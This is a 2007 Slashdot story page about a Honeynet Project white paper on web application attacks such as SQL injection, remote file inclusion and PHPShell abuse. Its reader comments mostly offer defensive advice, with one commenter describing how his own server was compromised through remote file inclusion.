Want to read Slashdot from your mobile device? Point it at m.slashdot.org and keep reading!

 



Forgot your password?
typodupeerror
×
Security The Internet IT

Honeynet Delineates Web Application Threats 40

An anonymous reader sends us to a technical white paper written by the Honeynet Project & Research Alliance: Know Your Enemy: Web Application Threats. Based on analysis of malware collected by the project, the paper outlines a number of HTTP-based attacks against web applications and some ways of protecting Web servers. Included are code injection, remote code-inclusion, SQL injection, cross-site scripting, and exploitation of the PHPShell application.
This discussion has been archived. No new comments can be posted.

Honeynet Delineates Web Application Threats

Comments Filter:
  • Based on analysis of malware collected by the project, the paper outlines a number of HTTP-based attacks against web applications and some ways of protecting Web servers.

    chroot and run it as nobody?
    Install mod_security?
    • Re: (Score:3, Informative)

      Well, don't use "nobody", use a non-shared account with a name like "www". And chroot won't help you with a SQL injection attack, especially if the scripts log in as "sa" (don't laugh, I've seen it done).

      If it's the apps being attacked and not the server, the first line of defense is to sanitize user input.
    • Se Linux is probably a better idea than chroot.
  • Based on descriptions of the attacks in the article it looks like your general attacker is some kiddie that wields Google like a broad sword. Sure, they did have some attempts to recruit the honeypot into a bot net or set up a phishing attempt but most of the attacks just overwrote index (with text from a tutorial no less) or moved around in the file system. I didn't know the ratio of kiddies to people who know what their doing was so out of whack.
  • Patch! Patch! Patch! (Score:4, Informative)

    by gbulmash ( 688770 ) <semi_famousNO@SPAMyahoo.com> on Sunday February 25, 2007 @11:49PM (#18149140) Homepage Journal
    The basic theme of this seems to be "patch! patch! patch!". A lot of the scripts they discussed (AWStats, phpBB, etc.) are ones where the people who use them don't have the expertise to dig into their code and fix problems themselves (or possibly even understand what the problems are).

    The three rules of running a web app you didn't write:
    • 1: Subscribe to the announcements mailing list
    • 2: Apply patches immediately
    • 3: Back-up your shit regularly, because even if you do 1 and 2, you might get hit and then you're going to need your backups.
    Rule three is sort of universal for any webmaster, whatever they're running, even if they wrote it all themselves and have security certifications up the wazoo. Not running back-ups is about as wise as putting your 401k funds into lottery tickets.

    - Greg
  • Related work (Score:5, Interesting)

    by Beryllium Sphere(tm) ( 193358 ) on Sunday February 25, 2007 @11:54PM (#18149158) Journal
    It's a good article for people who aren't focusing on security professionally. It shouldn't be news to anybody who keeps up with trends, though -- is anyone really still using register_globals?!

    Michal Zalewski pointed out a cute hack some years ago. Search engine spiders have to follow links that end in queries, like "toparticle.php?page=1". Barring extraordinary and ultimately impossible care in the coding of the spiders, they could also follow URLs that include attack code after the question mark. In _Silence on the Wire_, he imagined a crook building a long list of links to potentially vulnerable systems, appending attack code to each, and leaving the list someplace where Googlebot and its colleagues will find it. Googlebot could twist the doorknob on 1.5 million PHPBB systems a lot faster than the crook possibly could.
  • by mrkitty ( 584915 ) on Monday February 26, 2007 @02:21AM (#18149912) Homepage
    By The Web Application Security Consortium "From a counter-intelligence perspective, standard honeypot/honeynet technologies have not bared much fruit in the way of web attack data. Web-based honeypots have not been as successful as OS level or other honeypot applications (such as SMTP) due to the lack of their perceived value. Deploying an attractive honeypot web site is a complicated, time-consuming task. Other than a Script Kiddie probing for an easy defacement or an indiscriminant worm, you just won't get much traffic. So the question is - How can we increase our traffic, and thus, our chances of obtaining valuable web attack reconnaissance? This project will use one of the web attacker's most trusted tools against him - the Open Proxy server. Instead of being the target of the attacks, we opt to be used as a conduit of the attack data in order to gather our intelligence. By deploying multiple, specially configured open proxy server (or proxypot), we aim to take a birds-eye look at the types of malicious traffic that traverse these systems. The honeypot systems will conduct real-time analysis on the HTTP traffic to categorize the requests into threat classifications outlined by the Web Security Threat Classification and report all logging data to a centralized location." http://www.webappsec.org/projects/honeypots/ [webappsec.org]
  • Compromised server (Score:5, Informative)

    by tttonyyy ( 726776 ) on Monday February 26, 2007 @05:11AM (#18150792) Homepage Journal
    Unfortunately I know about this all too well, the hard way.

    Take your eye off the ball and lose your server, it's as simple as that.

    If you have a server with a lot of PHP applications running, you need to watch them all. I forgot about a CMS installation on my server that was being preserved for historical reasons (not even linked from the front page, but obviously visible to google), and sure enough, it got exploited via a remote inclusion attack and was used for nefarious perposes for a while without being noticing.

    Checking the logs, the definite path of attack was a google for a known vunerable version of the CMS system, and then application of a perl script to perform the hack. Clearly the vunerable system goes into a database of known vunerable systems that gets shared, because to this day, despite the CMS system being backed up and taken offline, my server get attacks about once every 20 minutes from perl scripts targeting that CMS.

    I also regularly see bots automatically filling in registration forms with spam, and wikis getting referrer comments added to them or even the content changed by bots.

    Looking after even a smallish webserver has proven to be a royal pain in the proverbial.

    Regarding PHPShell, I'd hope most people hash their password in the config file rather than leaving it plain-text, and also hide it away somewhere non-obvious (maybe behind another level of protection to keep the webcrawlers from spotting it). But even with hashed passwords, logging in still uses a plaintext password, and is thus equally vunerable to good old ftp and telnet password sniffing. The Joomla extension to provide a plugin PHPShell is a worrying development, and I'm sure will lead to more PHPShell discoveries on servers.

    Really the only way to avoid being compromised if you have a semi-busy site, is to learn how to compromise websites yourself, and try it on your own site (and it also teachs you what to look out for in logs). This in combination with regular patching seems to be the best way to stay one step ahead.

    And yes, keeping the evidence is good - it gets stupid kids kicked off their ISPs when you send them the proof. ;) Now *that* is some satisfying karma. :)

If all the world's economists were laid end to end, we wouldn't reach a conclusion. -- William Baumol

Working...